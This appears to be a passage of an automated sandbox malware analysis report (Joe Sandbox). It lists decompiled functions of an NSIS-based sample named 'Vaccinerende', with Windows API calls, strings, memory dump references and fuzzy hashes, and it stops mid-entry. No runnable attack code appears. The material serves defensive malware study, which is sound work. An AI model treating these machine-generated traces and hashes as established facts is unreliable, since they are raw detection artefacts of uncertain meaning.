                                                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                              • Instruction Fuzzy Hash: CD015E71900218BADB00DB94DD85FFFBBBCAF95711F10412BBA51B61D0D7B4A9018BA4
                                                                              Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                                              • MulDiv.KERNEL32 ref: 00402E20
                                                                              • wsprintfW.USER32 ref: 00402E30
                                                                              • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                                              Strings
                                                                              • verifying installer: %d%%, xrefs: 00402E2A
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                              • String ID: verifying installer: %d%%
                                                                              • API String ID: 1451636040-82062127
                                                                              • Opcode ID: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                                                              • Instruction ID: 725db9d4d41e60ee2dd5d311e5346f84fbed97106a71cca60d70b9a4d06edbb5
                                                                              • Opcode Fuzzy Hash: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                                                              • Instruction Fuzzy Hash: 73014471640208ABDF209F60DD49FAA3B69EB00708F008039FA05F91D0DBB989558B99
                                                                              Function 004065B6 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104,UXTHEME), ref: 004065CD
                                                                              • wsprintfW.USER32 ref: 00406608
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040661C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                              • API String ID: 2200240437-1946221925
                                                                              • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                              • Instruction ID: f2f916ca2f11fba704df1b43a3ace0cea71321b702594bff0db05fa861777559
                                                                              • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                              • Instruction Fuzzy Hash: F9F0F670500219BBCF24AB68ED0DF9B3B6CAB00704F50447AA646F10D1EB78DA24CBA8
                                                                              Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                                              • GlobalFree.KERNEL32(?), ref: 00402950
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                                              • CloseHandle.KERNEL32(?), ref: 0040297B
                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                              • String ID:
                                                                              • API String ID: 2667972263-0
                                                                              • Opcode ID: 49a6233bec7a959410d96ab4a6536f428a311d60b3465505635374f74429998f
                                                                              • Instruction ID: c6e800f027f1e1b1e461e4fc783814b3910171fe2b09394c7840a14eb176b3fb
                                                                              • Opcode Fuzzy Hash: 49a6233bec7a959410d96ab4a6536f428a311d60b3465505635374f74429998f
                                                                              • Instruction Fuzzy Hash: 9821BFB1D00124BBDF206FA5DE49D9E7E79EF08364F10423AF954762E1CB794C419B98
                                                                              Function 004030FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTickCount.KERNEL32(?,00000004,00000000,00000000,00000000), ref: 0040315B
                                                                              • GetTickCount.KERNEL32(0040CEA0,00004000), ref: 004031DC
                                                                              • MulDiv.KERNEL32 ref: 00403209
                                                                              • wsprintfW.USER32 ref: 0040321C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: CountTick$wsprintf
                                                                              • String ID: ... %d%%
                                                                              • API String ID: 551687249-2449383134
                                                                              • Opcode ID: 72615b24cfb956d11cf5a86cb9c852f061a4764c0f8f0ff8739073b09940aca9
                                                                              • Instruction ID: 2f3e22fda6cf622f8bf4b8160786ddb998526db62ce5623fe0a3028d3f0862ac
                                                                              • Opcode Fuzzy Hash: 72615b24cfb956d11cf5a86cb9c852f061a4764c0f8f0ff8739073b09940aca9
                                                                              • Instruction Fuzzy Hash: A3517171900219EBCB10DF65DA48B9F3B68AF45366F1441BFF805B72C0D7789E508BA9
                                                                              Function 00404A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF), ref: 00404B0D
                                                                              • wsprintfW.USER32 ref: 00404B16
                                                                              • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                              • String ID: %u.%u%s%s$6B
                                                                              • API String ID: 3540041739-3884863406
                                                                              • Opcode ID: b14d53b64adc1f374c4cfcdb21d002b99befe6dd1747fbc8fe84211fb49063b4
                                                                              • Instruction ID: 5e68f5a3766037a7274f1f000e531c578f4d2f2b22a3e42eca2e55653584bdbe
                                                                              • Opcode Fuzzy Hash: b14d53b64adc1f374c4cfcdb21d002b99befe6dd1747fbc8fe84211fb49063b4
                                                                              • Instruction Fuzzy Hash: F111D8736481283BDB00656D9C45E9F329CDB81374F150237FE66F61D1D9788C2186EC
                                                                              Function 004064E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Char$Next$Prev
                                                                              • String ID: *?|<>/":
                                                                              • API String ID: 589700163-165019052
                                                                              • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                              • Instruction ID: 6610343985016d4d3861ed5752e28572e14021042ee5aa5e44fa789d85a72fac
                                                                              • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                              • Instruction Fuzzy Hash: 0811B255800612A5DB303B14AD40AB7A2B8EF58794F52403FED9AB32C5E77C9C9286BD
                                                                              Function 0040176F Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrcatW.KERNEL32(00000000,00000000,0040A5A8,00436000,?,?,00000031), ref: 004017B0
                                                                              • CompareFileTime.KERNEL32(-00000014,?,0040A5A8,0040A5A8,00000000,00000000,0040A5A8,00436000,?,?,00000031), ref: 004017D5
                                                                                • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                                                • Part of subcall function 004052B0: lstrlenW.KERNEL32(004226C8,00000000,?,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                                                • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,004226C8,00000000,?,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                                • Part of subcall function 004052B0: lstrcatW.KERNEL32(004226C8,00403233,00403233,004226C8,00000000,?,00403094), ref: 0040530B
                                                                                • Part of subcall function 004052B0: SetWindowTextW.USER32(004226C8,004226C8,00000000,?,00403094,?,?,?,?,?,?,?,?,?,00403233), ref: 0040531D
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                              • String ID:
                                                                              • API String ID: 1941528284-0
                                                                              • Opcode ID: 47ce6a9d9fbc71e10f5336432a93a05ba538ef86279b97ebc953335fde788606
                                                                              • Instruction ID: a770c97b6a534c03b62b220807ae8b4c56d0338f794e1485d955ae8f7948b73c
                                                                              • Opcode Fuzzy Hash: 47ce6a9d9fbc71e10f5336432a93a05ba538ef86279b97ebc953335fde788606
                                                                              • Instruction Fuzzy Hash: 69419331900519BECF117BB5CD45DAF3A79EF45329B20827FF412B11E2CA3C8A619A6D
                                                                              Function 00401DB3 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDC.USER32(?), ref: 00401DB6
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A,00000048), ref: 00401DD0
                                                                              • MulDiv.KERNEL32 ref: 00401DD8
                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                                              • CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                              • String ID:
                                                                              • API String ID: 3808545654-0
                                                                              • Opcode ID: bc375dde46825d3f1d903fa7ab5296d8f4650d21e22a6159151442d341355b9e
                                                                              • Instruction ID: beb1058faab58ab776b37266111e77616320e0f2a6455f46a6b6c1c153f06785
                                                                              • Opcode Fuzzy Hash: bc375dde46825d3f1d903fa7ab5296d8f4650d21e22a6159151442d341355b9e
                                                                              • Instruction Fuzzy Hash: B6015272558241EFE7006BB0AF8AA9A7FB4AB55301F10497EF241B61E2CA7800458B2D
                                                                              Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                              • LoadImageW.USER32 ref: 00401D8B
                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                              • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                              • String ID:
                                                                              • API String ID: 1849352358-0
                                                                              • Opcode ID: 6c88db696a2834356160cf22a034812d05f7fa2de6f9a6422368acb1ec934c8d
                                                                              • Instruction ID: 477f9c078023e6e9cc07b453b9f7f3a7004dd49873a1bfc78c69f95ea128efdf
                                                                              • Opcode Fuzzy Hash: 6c88db696a2834356160cf22a034812d05f7fa2de6f9a6422368acb1ec934c8d
                                                                              • Instruction Fuzzy Hash: CAF0EC72604518AFDB01DBE4DE88CEEB7BCEB08341B14047AF641F61A1CA749D118B78
                                                                              Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Timeout
                                                                              • String ID: !
                                                                              • API String ID: 1777923405-2657877971
                                                                              • Opcode ID: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                                                              • Instruction ID: 29033229b0686faa5c7805d11c7179544b5b5cf9f353c3a0c808591dcba6bfc2
                                                                              • Opcode Fuzzy Hash: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                                                              • Instruction Fuzzy Hash: 1521C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D1D7B84541DB28
                                                                              Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Close$Enum
                                                                              • String ID:
                                                                              • API String ID: 464197530-0
                                                                              • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                              • Instruction ID: 57c196990662b4067a631aae43276665adbe806e29497986ae1bc13e9df6c193
                                                                              • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                              • Instruction Fuzzy Hash: 4C115832540509FBDF129F90CE09BAE7B69AF58340F110076B905B50E0E7B59E21AB68
                                                                              Function 0040577F Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057C2
                                                                              • GetLastError.KERNEL32 ref: 004057D6
                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057EB
                                                                              • GetLastError.KERNEL32 ref: 004057F5
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                              • String ID:
                                                                              • API String ID: 3449924974-0
                                                                              • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                              • Instruction ID: a96db4d766433405fa600e453148f039d13b259e3fca1cfbe784ddd29ae139cf
                                                                              • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                              • Instruction Fuzzy Hash: 52010871C10619DADF01DFA4CD44BEFBBB8EB14355F00407AD545B6281E7789608DFA9
                                                                              Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32 ref: 00402E70
                                                                              • GetTickCount.KERNEL32(00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E8E
                                                                              • CreateDialogParamW.USER32 ref: 00402EAB
                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402EB9
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                              • String ID:
                                                                              • API String ID: 2102729457-0
                                                                              • Opcode ID: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                                                              • Instruction ID: fe37ef1f42e63d928baf9b7628c588a3f0f600393ee4f6b464cc40035c08f26a
                                                                              • Opcode Fuzzy Hash: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                                                              • Instruction Fuzzy Hash: FAF03A30945620EFC7216B64FE0C99B7B65BB04B0174549BEF444F11A8CBB54881CA9C
                                                                              Function 00405224 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 00405253
                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004052A4
                                                                                • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                              • String ID:
                                                                              • API String ID: 3748168415-3916222277
                                                                              • Opcode ID: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                                                              • Instruction ID: c9233ab90339d663537cd0f4838c8d9c3e37dbb77af5ce129741796423ccaa39
                                                                              • Opcode Fuzzy Hash: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                                                              • Instruction Fuzzy Hash: 4701717160060CABDF218F11ED80A9B3766EF94355F10447AF604752D0C77AAD929E2D
                                                                              Function 00405D6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTickCount.KERNEL32(00437800,00437800,?,?,00435000,0040333B,00437000,00437800,00437800,00437800,00437800,00437800,7570D4C4,00403589,?,00000006), ref: 00405D8B
